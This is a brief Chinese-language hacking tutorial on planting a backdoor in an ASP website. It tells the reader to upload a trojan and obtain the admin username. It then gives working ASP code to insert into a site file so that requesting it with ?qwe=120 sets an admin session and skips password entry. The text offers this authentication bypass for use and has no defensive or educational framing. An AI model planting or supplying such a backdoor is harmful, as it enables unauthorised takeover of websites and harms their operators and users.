首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的<%…………%>之间加上 dim id id=trim(request("qwe")) if id="120" then session("AdminName")="管理员用户名" end if 然后访问的时候在这个ASP文件后面加上?qwe=120 然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这里我们就少了一步(破解MD5密码)…………嗯,不错